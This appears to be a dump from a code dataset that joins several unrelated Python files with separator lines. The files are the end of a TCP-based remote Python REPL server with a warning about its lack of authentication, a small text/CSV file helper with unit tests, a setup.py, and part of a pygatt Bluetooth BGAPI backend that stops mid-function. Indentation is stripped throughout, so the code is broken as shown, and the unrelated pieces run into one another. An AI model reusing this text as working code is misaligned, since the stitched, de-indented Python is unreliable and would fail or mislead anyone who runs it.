# https://docs.python.org/3/library/socketserver.html#socketserver.StreamRequestHandler
def on_socket_disconnect(adaptor):
server_print(f"PTY on {os.ttyname(adaptor.slave)} for client {client_address_str} disconnected by client.")
os.write(adaptor.master, "quit()\n".encode("utf-8")) # as if this text arrived from the socket
def on_slave_disconnect(adaptor):
server_print(f"PTY on {os.ttyname(adaptor.slave)} for client {client_address_str} disconnected by PTY slave.")
adaptor = PTYSocketProxy(self.request, on_socket_disconnect, on_slave_disconnect)
adaptor.start()
server_print(f"PTY on {os.ttyname(adaptor.slave)} for client {client_address_str} opened.")
# fdopen the slave side of the PTY to get file objects to work with.
# Be sure not to close the fd when exiting, it is managed by PTYSocketProxy.
#
# Note we can open the slave side in text mode, so these streams can behave
# exactly like standard input and output. The proxying between the master side
# and the network socket runs in binary mode inside PTYSocketProxy.
with open(adaptor.slave, "wt", encoding="utf-8", closefd=False) as wfile:
with open(adaptor.slave, "rt", encoding="utf-8", closefd=False) as rfile:
# Set up the input and output streams for the thread we are running in.
# We use ThreadingTCPServer, so each connection gets its own thread.
# Here we just send the relevant object into each thread-local box.
_threadlocal_stdin << rfile
_threadlocal_stdout << wfile
_threadlocal_stderr << wfile
self.thread = threading.current_thread() # needed by remote Ctrl+C
# This must be the first thing printed by the server, so that the client
# can get the session id from it. This hack is needed for netcat compatibility.
#
# (In case of the custom client, it establishes two independent TCP connections.
# The REPL session must give an ID for attaching the control channel, but since
# we want it to remain netcat-compatible, it can't use the message protocol to
# send that information.)
print(f"REPL session {self.session_id} connected.") # print at the *client* side
if _banner != "":
print(_banner)
self.console = Console(locals=_console_locals_namespace)
# All errors except SystemExit are caught inside interact().
try:
server_print(f"Opening REPL session {self.session_id} for {client_address_str}.")
self.console.interact(banner=None, exitmsg="Bye.")
except SystemExit: # Close the connection upon server process exit.
pass
finally:
server_print(f"Closing PTY on {os.ttyname(adaptor.slave)} for {client_address_str}.")
adaptor.stop()
server_print(f"Closing REPL session {self.session_id} for {client_address_str}.")
except BaseException as err: # yes, SystemExit and KeyboardInterrupt, too.
server_print(err)
finally:
del _active_sessions[self.session_id]
# TODO: IPv6 support
def start(locals, bind="127.0.0.1", repl_port=1337, control_port=8128, banner=None):
"""Start the REPL server.
bind: Interface to bind to. The default value is recommended,
to accept connections from the local machine only.
repl_port: TCP port number for main channel (REPL session).
control_port: TCP port number for the control channel (tab completion
and Ctrl+C requests).
locals: Namespace (dict-like) to use as the locals namespace
of REPL sessions that connect to this server. It is
shared between sessions.
Some useful values for `locals`:
- `{}`, to make a clean environment which is seen by
the REPL sessions only. Maybe the most pythonic.
- `globals()`, the top-level namespace of the calling
module. Can be convenient, especially if the server
is started from your main module.
This is not set automatically, because explicit is
better than implicit.
In any case, note you can just grab modules from
`sys.modules` if you need to access their top-level scopes.
banner: Startup message. Default is to show help for usage.
To suppress, use banner="".
To connect to the REPL server (assuming default settings)::
python3 -m unpythonic.net.client localhost
**NOTE**: Currently, only one REPL server is supported per process,
but it accepts multiple simultaneous connections. A new thread is
spawned to serve each new connection.
**CAUTION**: There is absolutely no authentication support, so it is
recommended to only serve to localhost, and only on a machine whose
users you trust.
"""
global _server_instance, _console_locals_namespace
if _server_instance is not None:
raise RuntimeError("The current process already has a running REPL server.")
_console_locals_namespace = locals
for function in _repl_exports: # Inject REPL utilities
_console_locals_namespace[function.__name__] = function
global _banner
if banner is None:
default_msg = ("Unpythonic REPL server at {addr}:{port}, on behalf of:\n"
" {argv}\n"
" quit(), exit() or EOF (Ctrl+D) at the prompt disconnects this session.\n"
" halt() tells the server to close after the last session has disconnected.\n"
" print() prints in the REPL session.\n"
" NOTE: print() is only properly redirected in the session's main thread.\n"
" doc(obj) shows obj's docstring. Use this instead of help(obj) in the REPL.\n"
" server_print(...) prints on the stdout of the server.\n"
" A very limited form of job control is available:\n"
" bg(thunk) spawns and returns a background thread that runs thunk.\n"
" fg(thread) pops the return value of a background thread.\n"
" If you stash the thread object in the REPL locals, you can disconnect the\n"
" session, and read the return value in another session later.")
_banner = default_msg.format(addr=bind, port=repl_port, argv=" ".join(sys.argv))
else:
_banner = banner
# Set the prompts. We use four "." to make semi-sure the prompt string only appears as a prompt.
# The client needs to identify the prompts from the data stream in order to know when to switch
# between listening and prompting, so "..." is not even semi-safe (it's valid Python, as well as
# valid English).
sys.ps1 = ">>>> "
sys.ps2 = ".... "
# We use a combo of Shim and ThreadLocalBox to redirect attribute lookups
# to the thread-specific read/write streams.
#
# sys.stdin et al. are replaced by shims, which hold their targets in
# thread-local boxes. In the main thread (and as a default), the boxes contain
# the original sys.stdin et al., whereas in session threads, the boxes are filled
# with streams established for that particular session.
sys.stdin = Shim(_threadlocal_stdin)
sys.stdout = Shim(_threadlocal_stdout)
sys.stderr = Shim(_threadlocal_stderr)
# https://docs.python.org/3/library/socketserver.html#socketserver.BaseServer.server_address
# https://docs.python.org/3/library/socketserver.html#socketserver.BaseServer.RequestHandlerClass
server = ReuseAddrThreadingTCPServer((bind, repl_port), ConsoleSession)
server.daemon_threads = True # Allow Python to exit even if there are REPL sessions alive.
server_thread = threading.Thread(target=server.serve_forever, name="Unpythonic REPL server", daemon=True)
server_thread.start()
# Control channel for remote tab completion and remote Ctrl+C requests.
# Default port is 8128 because it's for *completing* things, and https://en.wikipedia.org/wiki/Perfect_number
# This is the first one above 1024, and was already known to Nicomachus around 100 CE.
cserver = ReuseAddrThreadingTCPServer((bind, control_port), ControlSession)
cserver.daemon_threads = True
cserver_thread = threading.Thread(target=cserver.serve_forever, name="Unpythonic REPL control server", daemon=True)
cserver_thread.start()
_server_instance = (server, server_thread, cserver, cserver_thread)
atexit.register(stop)
return bind, repl_port, control_port
def stop():
"""Stop the REPL server.
If the server has been started, this will be called automatically when the
process exits. It can be called earlier manually to shut down the server if
desired.
"""
global _server_instance, _console_locals_namespace
if _server_instance is not None:
server, server_thread, cserver, cserver_thread = _server_instance
server.shutdown()
server.server_close()
server_thread.join()
cserver.shutdown()
cserver.server_close()
cserver_thread.join()
_server_instance = None
sys.stdin = _original_stdin
sys.stdout = _original_stdout
sys.stderr = _original_stderr
_console_locals_namespace = None
atexit.unregister(stop)
if _original_ps1:
sys.ps1 = _original_ps1
else:
delattr(sys, "ps1")
if _original_ps2:
sys.ps2 = _original_ps2
else:
delattr(sys, "ps2")
# demo app
def main():
server_print("REPL server starting...")
bind, repl_port, control_port = start(locals={})
server_print(f"Started REPL server on {bind}:{repl_port}.")
try:
while True:
time.sleep(1)
if _halt_pending and not _active_sessions:
break
server_print("REPL server closed.")
except KeyboardInterrupt:
server_print("Server process got Ctrl+C, closing REPL server and all connections NOW.")
if __name__ == '__main__':
main()
|
nilq/baby-python
|
python
|
# standard
from collections import defaultdict, OrderedDict
import csv
import sys
import tempfile
import unittest
class File:
'''
An abstract class simplifying file access through the use of only two functions:
- read (file)
- write (data, file):
'''
@classmethod
def read(cls, filename):
'''
return file elements in a generator
'''
assert False
@classmethod
def write(cls, data, filename):
'''
write data to filename
'''
assert False
@staticmethod
def decomment(file, comment):
for row in file:
if comment is None:
yield row
else:
raw = row.split(comment)[0].strip()
if raw:
yield raw
class Text(File):
'''
Instantiate the File class for a simple text file
'''
@classmethod
def read(cls, filename, comment=None, blanklines=False, strip=True):
'''
- comment: ignore comments
- blanklines: ignore blank lines
- strip: strip write space
'''
def line(d):
if comment is None:
return d
elif comment not in d:
return d
else:
return d[:d.index(comment)].strip()
with open(filename, 'rt') as f:
for datum in f:
if strip:
d = datum.strip()
else:
d = datum.rstrip()
if blanklines:
yield line(d)
elif len(d) > 0:
remnant = line(d)
if len(remnant) > 0:
yield remnant
@classmethod
def write(cls,
data,
filename,
eol='\n' # explicitly change the End of Line marker
):
if filename is None:
f = sys.stdout
else:
f = open(filename, 'wt')
with f:
for datum in data:
f.write(datum + eol)
class CSV(File):
'''
Instantiate the File class for Comma Separated Values (CSV)
'''
@classmethod
def read(cls,
filename,
header=True,
comment=None,
fields=None):
'''
- header: is first line the header?
- fields: optional list of field values
'''
with open(filename, 'rt') as file:
csv_file = csv.reader(File.decomment(file, comment))
for i, record in enumerate(csv_file):
if len(record) == 0:
continue
record = [f.strip() for f in record]
if header:
if i == 0:
if fields is None:
fields = record
else:
yield OrderedDict(list(zip(fields, record)))
else:
yield record
@classmethod
def write(cls,
data,
filename=None,
fields=None,
header=True,
append=False,
delimiter=','):
'''
- fields: optional list of field values
- header: display header on first line?
- append: add to existing file?
- delimiter: what character to use for separating elements
'''
def formatter(datum, fields):
if not isinstance(datum, dict):
return dict(list(zip(fields, [str(d) for d in datum])))
else:
d = defaultdict()
for field in fields:
if field in datum:
d[field] = datum[field]
return d
if append:
mode = 'a'
else:
mode = 'w'
if filename is None:
f = sys.stdout
elif sys.version_info < (3, 0, 0):
mode += 'b'
f = open(filename, mode)
else:
f = open(filename, mode, newline='')
with f as csv_file:
first = True
for datum in data:
if first:
if fields is None:
if isinstance(datum, dict):
fields = list(datum.keys())
else:
fields = datum # first line is the list of fields
csv_writer = csv.DictWriter(csv_file, fields,
lineterminator='\n', delimiter=delimiter)
if header:
csv_writer.writerow(dict(list(zip(fields, fields))))
first = False
csv_writer.writerow(formatter(datum, fields))
class Test_File(unittest.TestCase):
def setUp(self):
self.named = tempfile.NamedTemporaryFile(delete=True)
self.data = [[i+str(j) for j in range(4)] for i in ['x', 'a', 'b', 'c']]
self.filename = self.named.name
def tearDown(self):
self.named.close()
def test_text(self):
data = [' '.join(datum) for datum in self.data]
Text.write(data, self.filename)
for i, same in enumerate(Text.read(self.filename)):
assert data[i] == same
def test_csv(self):
CSV.write(self.data, self.filename, header=False)
for i, same in enumerate(CSV.read(self.filename, header=True)):
assert list(same.keys()) == self.data[0]
assert list(same.values()) == self.data[i+1]
if __name__ == '__main__':
unittest.main()
|
nilq/baby-python
|
python
|
from setuptools import setup, find_packages
setup(
name="users",
version="0.1.0",
description="Stoic authentication service",
license="Apache",
packages=find_packages(),
)
|
nilq/baby-python
|
python
|
from __future__ import print_function
# for Python 2/3 compatibility
try:
import queue
except ImportError:
import Queue as queue
import logging
import serial
import time
import threading
from binascii import hexlify, unhexlify
from uuid import UUID
from enum import Enum
from collections import defaultdict
from pygatt.exceptions import NotConnectedError
from pygatt.backends import BLEBackend, Characteristic, BLEAddressType
from pygatt.util import uuid16_to_uuid
from . import bglib, constants
from .exceptions import BGAPIError, ExpectedResponseTimeout
from .device import BGAPIBLEDevice
from .bglib import EventPacketType, ResponsePacketType
from .packets import BGAPICommandPacketBuilder as CommandBuilder
from .error_codes import get_return_message
from .util import find_usb_serial_devices
try:
import termios
except ImportError:
# Running in Windows (not Linux/OS X/Cygwin)
serial_exception = RuntimeError
else:
serial_exception = termios.error
log = logging.getLogger(__name__)
BLED112_VENDOR_ID = 0x2458
BLED112_PRODUCT_ID = 0x0001
MAX_CONNECTION_ATTEMPTS = 10
UUIDType = Enum('UUIDType', ['custom', 'service', 'attribute',
'descriptor', 'characteristic',
'nonstandard'])
def _timed_out(start_time, timeout):
return time.time() - start_time > timeout
def bgapi_address_to_hex(address):
address = hexlify(bytearray(
list(reversed(address)))).upper().decode('ascii')
return ':'.join(''.join(pair) for pair in zip(*[iter(address)] * 2))
class AdvertisingAndScanInfo(object):
"""
Holds the advertising and scan response packet data from a device at a given
address.
"""
def __init__(self):
self.name = ""
self.address = ""
self.rssi = None
self.packet_data = {
# scan_response_packet_type[xxx]: data_dictionary,
}
class BGAPIBackend(BLEBackend):
"""
A BLE backend for a BGAPI compatible USB adapter.
"""
def __init__(self, serial_port=None, receive_queue_timeout=0.1):
"""
Initialize the backend, but don't start the USB connection yet. Must
call .start().
serial_port -- The name of the serial port for the BGAPI-compatible
USB interface. If not provided, will attempt to auto-detect.
"""
self._lib = bglib.BGLib()
self._serial_port = serial_port
self._receive_queue_timeout = receive_queue_timeout
self._ser = None
self._receiver = None
self._running = None
self._lock = threading.Lock()
# buffer for packets received
self._receiver_queue = queue.Queue()
# State
self._num_bonds = 0 # number of bonds stored on the adapter
self._stored_bonds = [] # bond handles stored on the adapter
self._devices_discovered = {
# 'address': AdvertisingAndScanInfo,
# Note: address formatted like "01:23:45:67:89:AB"
}
self._characteristics = defaultdict(dict)
self._connections = {}
self._current_characteristic = None # used in char/descriptor discovery
self._packet_handlers = {
ResponsePacketType.sm_get_bonds: self._ble_rsp_sm_get_bonds,
EventPacketType.attclient_attribute_value: (
self._ble_evt_attclient_attribute_value),
EventPacketType.attclient_find_information_found: (
self._ble_evt_attclient_find_information_found),
EventPacketType.connection_status: self._ble_evt_connection_status,
EventPacketType.connection_disconnected: (
self._ble_evt_connection_disconnected),
EventPacketType.gap_scan_response: self._ble_evt_gap_scan_response,
EventPacketType.sm_bond_status: self._ble_evt_sm_bond_status,
}
log.debug("Initialized new BGAPI backend")
def _detect_device_port(self):
log.debug("Auto-detecting serial port for BLED112")
detected_devices = find_usb_serial_devices(
vendor_id=BLED112_VENDOR_ID,
product_id=BLED112_PRODUCT_ID)
if len(detected_devices) == 0:
raise BGAPIError("Unable to auto-detect BLED112 serial port")
log.info("Found BLED112 on serial port %s",
detected_devices[0].port_name)
return detected_devices[0].port_name
def _open_serial_port(self,
max_connection_attempts=MAX_CONNECTION_ATTEMPTS):
"""
Open a connection to the named serial port, or auto-detect the first
port matching the BLED device. This will wait until data can actually be
read from the connection, so it will not return until the device is
fully booted.
max_connection_attempts -- Max number of times to retry
detecting and connecting to a device.
Raises a NotConnectedError if the device cannot connect after 10
attempts, with a short pause in between each attempt.
"""
for attempt in range(max_connection_attempts):
log.debug("Opening connection to serial port (attempt %d)",
attempt + 1)
try:
serial_port = self._serial_port or self._detect_device_port()
self._ser = None
self._ser = serial.Serial(serial_port, baudrate=115200,
timeout=0.25)
# Wait until we can actually read from the device
self._ser.read()
break
except (BGAPIError, serial.serialutil.SerialException,
serial_exception):
log.debug("Failed to open serial port", exc_info=True)
if self._ser:
self._ser.close()
elif attempt == 0:
raise NotConnectedError(
"No BGAPI compatible device detected")
self._ser = None
time.sleep(0.25)
else:
raise NotConnectedError("Unable to reconnect with USB "
"device after rebooting")
def _initialize_device(self, reset=True):
""" Prepare an opened BGAPI device for use """
self._receiver = threading.Thread(target=self._receive)
self._receiver.daemon = True
self._running = threading.Event()
self._running.set()
self._receiver.start()
# Stop any ongoing procedure
log.debug("Stopping any outstanding GAP procedure")
self.send_command(CommandBuilder.gap_end_procedure())
try:
self.expect(ResponsePacketType.gap_end_procedure)
except BGAPIError:
# Ignore any errors if there was no GAP procedure running
pass
self.disable_advertising(skip_reply=not reset)
self.set_bondable(False)
# Check to see if there are any existing connections and add them
# Request the number of currently connected modules from the adapter
self.send_command(CommandBuilder.system_get_connections())
_, connections = self.expect(ResponsePacketType.system_get_connections)
# Adapter should also generate one EventPacketType.connection_status
# for each supported connection
for _ in range(connections['maxconn']):
_, conn = self.expect(EventPacketType.connection_status)
# If any connection flags are set, this is an active connection
if conn['flags'] > 0:
# Create new ble object to insert into the adapter
ble = BGAPIBLEDevice(bgapi_address_to_hex(conn['address']),
conn['connection_handle'],
self)
# pylint: disable=protected-access
self._connections[conn['connection_handle']] = ble
def start(self, reset=True, tries=5):
"""
Connect to the USB adapter, reset it's state and start a backgroud
receiver thread.
"""
if self._running and self._running.is_set():
self.stop()
# Fail immediately if no device is attached, don't retry waiting for one
# to be plugged in.
self._open_serial_port(max_connection_attempts=1)
if reset:
log.debug("Resetting and reconnecting to device for a clean environment")
# Blow everything away and start anew.
# Only way to be sure is to burn it down and start again.
# (Aka reset remote state machine)
# Note: Could make this a conditional based on parameter if this
# happens to be too slow on some systems.
# The zero param just means we want to do a normal restart instead of
# starting a firmware update restart.
self.send_command(CommandBuilder.system_reset(0))
self._ser.flush()
self._ser.close()
# Re-open the port. On Windows, it has been observed that the
# port is no immediately available - so retry for up to 2 seconds.
start = time.clock()
retry_t = 0.2
while True:
try:
self._open_serial_port()
except:
if time.clock() - start > 2:
raise
else:
log.debug('Port not ready, retry in %.2f seconds...' % retry_t)
time.sleep(retry_t)
else:
break
if tries is None or not tries:
# Try at least once to open the port
tries = 1
# Sometimes when opening the port without a reset, it'll fail to respond
# So let's try to repeat the initialization process a few times
while tries:
tries -= 1
try:
self._initialize_device(reset)
return
except ExpectedResponseTimeout:
if tries:
log.info("BLED unresponsive, re-opening")
self.stop()
self._open_serial_port(max_connection_attempts=1)
continue
# If we got here, we failed to open the port
raise NotConnectedError()
def stop(self):
for device in self._connections.values():
try:
device.disconnect()
except NotConnectedError:
pass
if self._running:
if self._running.is_set():
log.debug('Stopping')
self._running.clear()
if self._receiver:
self._receiver.join()
self._receiver = None
if self._ser:
self._ser.close()
self._ser = None
def set_bondable(self, bondable):
self.send_command(
CommandBuilder.sm_set_bondable_mode(
constants.bondable['yes' if bondable else 'no']))
self.expect(ResponsePacketType.sm_set_bondable_mode)
def disable_advertising(self, skip_reply=False):
log.debug("Disabling advertising")
self.send_command(
CommandBuilder.gap_set_mode(
constants.gap_discoverable_mode['non_discoverable'],
constants.gap_connectable_mode['non_connectable']))
if not skip_reply:
self.expect(ResponsePacketType.gap_set_mode)
def send_command(self, *args, **kwargs):
with self._lock:
if self._ser is None:
log.warn("Unexpectedly not connected to USB device")
raise NotConnectedError()
return self._lib.send_command(self._ser, *args, **kwargs)
def clear_bond(self, address=None):
"""
Delete the bonds stored on the adapter.
address - the address of the device to unbond. If not provided, will
erase all bonds.
Note: this does not delete the corresponding bond stored on the remote
device.
"""
# Find bonds
log.debug("Fetching existing bonds for devices")
self._stored_bonds = []
self.send_command(CommandBuilder.sm_get_bonds())
try:
self.expect(ResponsePacketType.sm_get_bonds)
except NotConnectedError:
pass
if self._num_bonds == 0:
return
while len(self._stored_bonds) < self._num_bonds:
self.expect(EventPacketType.sm_bond_status)
for b in reversed(self._stored_bonds):
log.debug("Deleting bond %s", b)
self.send_command(CommandBuilder.sm_delete_bonding(b))
self.expect(ResponsePacketType.sm_delete_bonding)
def scan(self, timeout=10, scan_interval=75, scan_window=50, active=True,
discover_mode=constants.gap_discover_mode['observation'],
**kwargs):
"""
Perform a scan to discover BLE devices.
timeout -- the number of seconds this scan should last.
scan_interval -- the number of miliseconds until scanning is restarted.
scan_window -- the number of miliseconds the scanner will listen on one
frequency for advertisement packets.
active -- True --> ask sender for scan response data. False --> don't.
discover_mode -- one of the gap_discover_mode constants.
"""
parameters = 1 if active else 0
# NOTE: the documentation seems to say that the times are in units of
# 625us but the ranges it gives correspond to units of 1ms....
self.send_command(
CommandBuilder.gap_set_scan_parameters(
scan_interval, scan_window, parameters
))
self.expect(ResponsePacketType.gap_set_scan_parameters)
log.debug("Starting an %s scan", "active" if active else "passive")
self.send_command(CommandBuilder.gap_discover(discover_mode))
self.expect(ResponsePacketType.gap_discover)
log.debug("Pausing for %ds to allow scan to complete", timeout)
time.sleep(timeout)
log.debug("Stopping scan")
self.send_command(CommandBuilder.gap_end_procedure())
self.expect(ResponsePacketType.gap_end_procedure)
devices = []
for address, info in self._devices_discovered.items():
devices.append({
'address': address,
'name': info.name,
'rssi': info.rssi,
'packet_data': info.packet_data
})
log.debug("Discovered %d devices: %s", len(devices), devices)
self._devices_discovered = {}
return devices
def _end_procedure(self):
self.send_command(CommandBuilder.gap_end_procedure())
self.expect(ResponsePacketType.gap_end_procedure)
def connect(self, address, timeout=5,
address_type=BLEAddressType.public,
interval_min=60, interval_max=76, supervision_timeout=100,
latency=0):
"""
Connnect directly to a device given the ble address then discovers and
stores the characteristic and characteristic descriptor handles.
Requires that the adapter is not connected to a device already.
address -- a bytearray containing the device mac address.
timeout -- number of seconds to wait before returning if not connected.
address_type -- one of BLEAddressType's values, either public or random.
Raises BGAPIError or NotConnectedError on failure.
"""
address_bytes = bytearray(unhexlify(address.replace(":", "")))
for device in self._connections.values():
if device._address == bgapi_address_to_hex(address_bytes):
return device
log.debug("Connecting to device at address %s (timeout %ds)",
address, timeout)
self.set_bondable(False)
if address_type == BLEAddressType.public:
addr_type = constants.ble_address_type['gap_address_type_public']
else:
addr_type = constants.ble_address_type['gap_address_type_random']
self.send_command(
CommandBuilder.gap_connect_direct(
address_bytes, addr_type, interval_min, interval_max,
supervision_timeout, latency))
try:
self.expect(ResponsePacketType.gap_connect_direct)
_, packet = self.expect(EventPacketType.connection_status,
timeout=timeout)
# TODO what do we do if the status isn't 'connected'? Retry?
# Raise an exception? Should also check the address matches the
# expected TODO i'm finding that when reconnecting to the same
# MAC, we geta conneciotn status of "disconnected" but that is
# picked up here as "connected", then we don't get anything
# else.
if self._connection_status_flag(
packet['flags'],
constants.connection_status_flag['connected']):
device = BGAPIBLEDevice(
bgapi_address_to_hex(packet['address']),
packet['connection_handle'],
self)
if self._connection_status_flag(
packet['flags'],
constants.connection_status_flag['encrypted']):
device.encrypted = True
self._connections[packet['connection_handle']] = device
log.info("Connected to %s", address)
return device
except ExpectedResponseTimeout:
# If the connection doesn't occur because the device isn't there
# then you should manually stop the command.
#
# If we never get the connection status it is likely that it
# didn't occur because the device isn't there. If that is true
# then we have to manually stop the command.
self._end_procedure()
exc = NotConnectedError()
exc.__cause__ = None
raise exc
def discover_characteristics(self, connection_handle):
att_handle_start = 0x0001 # first valid handle
att_handle_end = 0xFFFF # last valid handle
log.debug("Fetching characteristics for connection %d",
connection_handle)
self.send_command(
CommandBuilder.attclient_find_information(
connection_handle, att_handle_start, att_handle_end))
self.expect(ResponsePacketType.attclient_find_information)
self.expect(EventPacketType.attclient_procedure_completed,
timeout=10)
for char_uuid_str, char_obj in (
self._characteristics[connection_handle].items()):
log.debug("Characteristic 0x%s is handle 0x%x",
char_uuid_str, char_obj.handle)
for desc_uuid_str, desc_handle in (
char_obj.descriptors.items()):
log.debug("Characteristic descriptor 0x%s is handle 0x%x",
desc_uuid_str, desc_handle)
return self._characteristics[connection_handle]
@staticmethod
def _connection_status_flag(flags, flag_to_find):
"""
Is the given flag in the connection status flags?
flags -- the 'flags' parameter returned by ble_evt_connection_status.
flag_to_find -- the flag to look for in flags.
Returns true if flag_to_find is in flags. Returns false otherwise.
"""
return (flags & flag_to_find) == flag_to_find
@staticmethod
def _get_uuid_type(uuid):
"""
Checks if the UUID is a custom 128-bit UUID or a GATT characteristic
descriptor UUID.
uuid -- the UUID as a bytearray.
Return a UUIDType.
"""
if len(uuid) == 16: # 128-bit --> 16 byte
return UUIDType.custom
if uuid in constants.gatt_service_uuid.values():
return UUIDType.service
if uuid in constants.gatt_attribute_type_uuid.values():
return UUIDType.attribute
if uuid in constants.gatt_characteristic_descriptor_uuid.values():
return UUIDType.descriptor
if uuid in constants.gatt_characteristic_type_uuid.values():
return UUIDType.characteristic
log.warn("Unrecognized 4 byte UUID %s", hexlify(uuid))
return UUIDType.nonstandard
def _scan_rsp_data(self, data):
"""
Parse scan response data.
Note: the data will come in a format like the following:
[data_length, data_type, data..., data_length, data_type, data...]
data -- the args['data'] list from _ble_evt_scan_response.
Returns a name and a dictionary containing the parsed data in pairs of
field_name': value.
"""
# Result stored here
data_dict = {
# 'name': value,
}
bytes_left_in_field = 0
field_name = None
field_value = []
# Iterate over data bytes to put in field
dev_name = ""
for b in data:
if bytes_left_in_field == 0:
# New field
bytes_left_in_field = b
field_value = []
else:
field_value.append(b)
bytes_left_in_field -= 1
if bytes_left_in_field == 0:
# End of field
field_name = (
constants.scan_response_data_type[field_value[0]])
field_value = field_value[1:]
# Field type specific formats
if (field_name == 'complete_local_name' or
field_name == 'shortened_local_name'):
dev_name = bytearray(field_value).decode("utf-8")
data_dict[field_name] = dev_name
elif (field_name ==
'complete_list_128-bit_service_class_uuids'):
if len(field_value) % 16 == 0: # 16 bytes
data_dict[field_name] = []
for i in range(0, int(len(field_value) / 16)):
service_uuid = (
"0x%s" %
bgapi_address_to_hex(
field_value[i * 16:i * 16 + 16]))
data_dict[field_name].append(service_uuid)
else:
log.warning("Expected a service class UUID of 16\
bytes. Instead received %d bytes",
len(field_value))
else:
data_dict[field_name] = bytearray(field_value)
return dev_name, data_dict
def expect(self, expected, *args, **kargs):
return self.expect_any([expected], *args, **kargs)
def expect_any(self, expected_packet_choices, timeout=None,
assert_return_success=True):
"""
Process packets until a packet of one of the expected types is found.
expected_packet_choices -- a list of BGLib.PacketType.xxxxx. Upon
processing a packet of a type contained in
the list, this function will return.
timeout -- maximum time in seconds to process packets.
assert_return_success -- raise an exception if the return code from a
matched message is non-zero.
Raises an ExpectedResponseTimeout if one of the expected responses is
not receiving withint the time limit.
"""
timeout = timeout or 1
log.debug("Expecting a response of one of %s within %fs",
expected_packet_choices, timeout or 0)
start_time = None
if timeout is not None:
start_time = time.time()
while True:
packet = None
try:
packet = self._receiver_queue.get(
timeout=self._receive_queue_timeout)
except queue.Empty:
if timeout is not None:
if _timed_out(start_time, timeout):
exc = ExpectedResponseTimeout(
expected_packet_choices, timeout)
exc.__cause__ = None
raise exc
continue
if packet is None:
raise ExpectedResponseTimeout(expected_packet_choices, timeout)
packet_type, response = self._lib.decode_packet(packet)
return_code = response.get('result', 0)
log.debug("Received a %s packet: %s",
packet_type, get_return_message(return_code))
if packet_type in self._packet_handlers:
self._packet_handlers[packet_type](response)
if packet_type in expected_packet_choices:
return packet_type, response
def _receive(self):
"""
Read bytes from serial and enqueue the packets if the packet is not a.
Stops if the self._running event is not set.
"""
log.debug("Running receiver")
while self._running.is_set():
packet = self._lib.parse_byte(self._ser.read())
if packet is not None:
decoded = self._lib.decode_packet(packet)
if decoded is None:
continue
packet_type, args = decoded
if packet_type == EventPacketType.attclient_attribute_value and\
args['connection_handle'] in self._connections:
device = self._connections[args['connection_handle']]
device.receive_notification(args['atthandle'],
bytearray(args['value']))
self._receiver_queue.put(packet)
log.debug("Stopping receiver")
def _ble_evt_attclient_attribute_value(self, args):
"""
Handles the event for values of characteristics.
args -- dictionary containing the attribute handle ('atthandle'),
attribute type ('type'), and attribute value ('value')
"""
log.debug("attribute handle = %x", args['atthandle'])
log.debug("attribute type = %x", args['type'])
log.debug("attribute value = 0x%s", hexlify(bytearray(args['value'])))
def _ble_evt_attclient_find_information_found(self, args):
"""
Handles the event for characteritic discovery.
Adds the characteristic to the dictionary of characteristics or adds
the descriptor to the dictionary of descriptors in the current
characteristic. These events will be occur in an order similar to the
following:
1) primary service uuid
2) 0 or more descriptors
3) characteristic uuid
4) 0 or more descriptors
5) repeat steps 3-4
args -- dictionary containing the characteristic handle ('chrhandle'),
and characteristic UUID ('uuid')
"""
raw_uuid = bytearray(reversed(args['uuid']))
# Convert 4-byte UUID shorthand to a full, 16-byte UUID
uuid_type = self._get_uuid_type(raw_uuid)
if uuid_type != UUIDType.custom:
uuid = uuid16_to_uuid(int(
bgapi_address_to_hex(args['uuid']).replace(':', ''), 16))
else:
uuid = UUID(bytes=bytes(raw_uuid))
# TODO is there a way to get the characteristic from the packet instead
# of having to track the "current" characteristic?
if (uuid_type == UUIDType.descriptor and
self._current_characteristic is not None):
self._current_characteristic.add_descriptor(uuid, args['chrhandle'])
elif (uuid_type == UUIDType.custom or
uuid_type == UUIDType.nonstandard or
uuid_type == UUIDType.characteristic):
if uuid_type == UUIDType.custom:
log.debug("Found custom characteristic %s" % uuid)
elif uuid_type == UUIDType.characteristic:
log.debug("Found approved characteristic %s" % uuid)
elif uuid_type == UUIDType.nonstandard:
log.debug("Found nonstandard 4-byte characteristic %s" % uuid)
new_char = Characteristic(uuid, args['chrhandle'])
self._current_characteristic = new_char
self._characteristics[
args['connection_handle']][uuid] = new_char
def _ble_evt_connection_disconnected(self, args):
"""
Handles the event for the termination of a connection.
"""
self._connections.pop(args['connection_handle'], None)
def _ble_evt_connection_status(self, args):
"""
Handles the event for reporting connection status.
args -- dictionary containing the connection status flags ('flags'),
device address ('address'), device address type ('address_type'),
connection interval ('conn_interval'), connection timeout
(timeout'), device latency ('latency'), device bond handle
('bonding')
"""
connection_handle = args['connection_handle']
if not self._connection_status_flag(
args['flags'],
constants.connection_status_flag['connected']):
# Disconnected
self._connections.pop(connection_handle, None)
log.debug("Connection status: handle=0x%x, flags=%s, address=0x%s, "
"connection interval=%fms, timeout=%d, "
"latency=%d intervals, bonding=0x%x",
connection_handle,
args['address'],
hexlify(bytearray(args['address'])),
args['conn_interval'] * 1.25,
args['timeout'] * 10,
args['latency'],
args['bonding'])
def _ble_evt_gap_scan_response(self, args):
"""
Handles the event for reporting the contents of an advertising or scan
response packet.
This event will occur during device discovery but not direct connection.
args -- dictionary containing the RSSI value ('rssi'), packet type
('packet_type'), address of packet sender ('sender'), address
type ('address_type'), existing bond handle ('bond'), and
scan resonse data list ('data')
"""
# Parse packet
packet_type = constants.scan_response_packet_type[args['packet_type']]
address = bgapi_address_to_hex(args['sender'])
name, data_dict = self._scan_rsp_data(args['data'])
# Store device information
if address not in self._devices_discovered:
self._devices_discovered[address] = AdvertisingAndScanInfo()
dev = self._devices_discovered[address]
if dev.name == "":
dev.name = name
if dev.address == "":
dev.address = address
if (packet_type not in dev.packet_data or
len(dev.packet_data[packet_type]) < len(data_dict)):
dev.packet_data[packet_type] = data_dict
dev.rssi = args['rssi']
log.debug("Received a scan response from %s with rssi=%d dBM "
"and data=%s", address, args['rssi'], data_dict)
def _ble_evt_sm_bond_status(self, args):
"""
Handles the event for reporting a stored bond.
Adds the stored bond to the list of bond handles.
args -- dictionary containing the bond handle ('bond'), encryption key
size used in the long-term key ('keysize'), was man in the
middle used ('mitm'), keys stored for bonding ('keys')
"""
# Add to list of stored bonds found or set flag
self._stored_bonds.append(args['bond'])
def _ble_rsp_sm_delete_bonding(self, args):
"""
Handles the response for the deletion of a stored bond.
args -- dictionary containing the return code ('result')
"""
result = args['result']
if result == 0:
self._stored_bonds.pop()
return result
def _ble_rsp_sm_get_bonds(self, args):
"""
